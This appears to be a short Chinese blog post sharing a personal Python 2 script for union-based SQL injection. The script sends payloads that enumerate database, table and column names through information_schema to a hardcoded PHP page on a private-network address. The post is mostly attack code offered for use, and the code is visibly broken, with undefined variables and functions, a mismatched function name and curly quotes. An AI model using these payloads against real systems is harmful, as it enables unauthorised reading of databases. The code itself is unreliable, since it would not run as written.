sqli自用腳本
阿新 • • 發佈:2019-01-27
getc 部分 php 取數 eas 註入 The 則表達式 http
//sqliIsSoEasy.py import requests import urllib import re payload={} payload_db = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA" payload_tb = "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"‘"+database_name+"‘" payload_col = "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"‘"+table_name+"‘" #有回顯的聯合查詢:通過一個正則表達式判斷是否有註入成功後的內容,若有則返回所需部分內容 def visitUrlByUnion(url,payload): data = urllib.urlencode(values) geturl = url+‘?‘+data response = requests.get(geturl) result=response.content find_list=re.findall(r"qwe~(.+?)~qwe", result) if len(find_list)>0: return find_list #獲取數據庫列表 def getDBName(url): name_list=get(url,payload_db) print ‘The databases:‘ for i in name_list: print i+" ", print "\n" #選擇數據庫,獲取表 def getTBName(url): database_name=raw_input(‘please input your database:‘) name_list=get(url,payload_tb) print ‘The tables:‘ for i in name_list: print i+" ", print "\n" #選擇表,獲取字段 def getCOLName(url): table_name=raw_input(‘please input your table:‘) name_list=get(url,payload_col) print ‘The columns:‘ for i in name_list: print i+" ", #選擇所有字段,獲取數據 if __name__ == ‘__main__‘: url=‘http://192.168.106.130/config/sql.php‘ getDBName(url) getTBName(url) getColName(url)
sqli自用腳本